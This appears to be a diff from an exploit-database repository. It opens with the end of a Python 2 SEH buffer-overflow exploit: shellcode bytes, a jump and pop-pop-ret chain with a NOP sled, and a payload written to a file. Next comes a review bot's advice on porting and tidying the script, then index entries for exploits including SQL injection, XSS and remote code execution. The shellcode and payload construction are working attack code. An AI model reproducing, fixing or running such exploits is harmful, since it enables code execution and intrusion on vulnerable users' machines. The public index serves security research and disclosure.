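+shellcode += "\xe8\x83\x15\x8c\xc2\x13\x63\x91\x0e\xe2\x8b"
+shellcode += "\x20\xe7\xb3\xb4\x8d\x6f\x34\xcd\xf3\x0f\xbb"
+shellcode += "\x04\xb0\x30\x5e\x8c\xcd\xd8\xc7\x45\x6c\x85"
+shellcode += "\xf7\xb0\xb3\xb0\x7b\x30\x4c\x47\x63\x31\x49"
+shellcode += "\x03\x23\xaa\x23\x1c\xc6\xcc\x90\x1d\xc3"
+
+payload = 'A' * (OFFSET - len(short_jump))
+payload += short_jump
+payload += pop_pop_ret
+payload += '\x90' * 8
+payload += shellcode
+
+f = open("exploit.txt", "w")
+f.write(payload)
+f.close()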
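Review bot: The header does not name the interpreter, and the script as written is Python 2 only: `struct.pack("<I", 0x01015af4)` returns `bytes` while `short_jump`, `shellcode` and `'A' * (...)` are `str`, so `payload += pop_pop_ret` raises `TypeError` on Python 3; a `# Python 2.x` line in the header (or a `#!/usr/bin/env python2` shebang on line 1) would document that requirement. The output file is opened with `open("exploit.txt", "w")` and closed by hand; `with open("exploit.txt", "wb") as f: f.write(payload)` closes it on error as well and makes the binary content explicit. The bare triple-quoted strings holding the mona output and the msfvenom command line are useful records, but as module-level string literals they read like docstrings for an importable module; plain `#` comments would make their role as notes clearer.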
@ -11232,6 +11232,7 @@ id,file,description,date,author,type,platform,port
49226,exploits/windows/local/49226.txt,"PDF Complete 3.5.310.2002 - 'pdfsvc.exe' Unquoted Service Path",2020-12-10,"Zaira Alquicira",local,windows,
49248,exploits/windows/local/49248.txt,"System Explorer 7.0.0 - 'SystemExplorerHelpService' Unquoted Service Path",2020-12-14,"Mohammed Alshehri",local,windows,
49259,exploits/linux/local/49259.c,"libbabl 0.1.62 - Broken Double Free Detection (PoC)",2020-12-15,"Carter Yagemann",local,linux,
49322,exploits/windows/local/49322.py,"10-Strike Network Inventory Explorer Pro 9.05 - Buffer Overflow (SEH)",2020-12-22,"Florian Gassner",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -43524,3 +43525,13 @@ id,file,description,date,author,type,platform,port
49307,exploits/php/webapps/49307.txt,"Online Marriage Registration System 1.0 - 'searchdata' SQL Injection",2020-12-21,"Raffaele Sabato",webapps,php,
49308,exploits/hardware/webapps/49308.js,"Sony Playstation 4 (PS4) < 6.72 - 'ValidationMessage::buildBubbleTree()' Use-After-Free WebKit Code Execution (PoC)",2020-11-12,Synacktiv,webapps,hardware,
49309,exploits/hardware/webapps/49309.js,"Sony Playstation 4 (PS4) < 7.02 - 'ValidationMessage::buildBubbleTree()' Use-After-Free WebKit Code Execution (PoC)",2020-12-16,ChendoChap,webapps,hardware,
49310,exploits/php/webapps/49310.txt,"Victor CMS 1.0 - File Upload To RCE",2020-12-22,Mosaaed,webapps,php,
49312,exploits/php/webapps/49312.txt,"Pandora FMS 7.0 NG 750 - 'Network Scan' SQL Injection (Authenticated)",2020-12-22,"Matthew Aberegg",webapps,php,
49314,exploits/php/webapps/49314.txt,"CSE Bookstore 1.0 - Multiple SQL Injection",2020-12-22,"Musyoka Ian",webapps,php,
49315,exploits/php/webapps/49315.txt,"Library Management System 3.0 - _Add Category_ Stored XSS",2020-12-22,"Kislay Kumar",webapps,php,
49316,exploits/php/webapps/49316.txt,"Multi Branch School Management System 3.5 - _Create Branch_ Stored XSS",2020-12-22,"Kislay Kumar",webapps,php,
49317,exploits/php/webapps/49317.rb,"WordPress Plugin W3 Total Cache - Unauthenticated Arbitrary File Read (Metasploit)",2020-12-22,"SunCSR Team",webapps,php,
49318,exploits/linux/webapps/49318.rb,"Webmin 1.962 - 'Package Updates' Escape Bypass RCE (Metasploit)",2020-12-22,AkkuS,webapps,linux,
49319,exploits/php/webapps/49319.txt,"Artworks Gallery Management System 1.0 - 'id' SQL Injection",2020-12-22,"Vijay Sachdeva",webapps,php,
49320,exploits/php/webapps/49320.txt,"Faculty Evaluation System 1.0 - Stored XSS",2020-12-22,"Vijay Sachdeva",webapps,php,
49321,exploits/linux/webapps/49321.py,"TerraMaster TOS 4.2.06 - RCE (Unauthenticated)",2020-12-22,IHTeam,webapps,linux,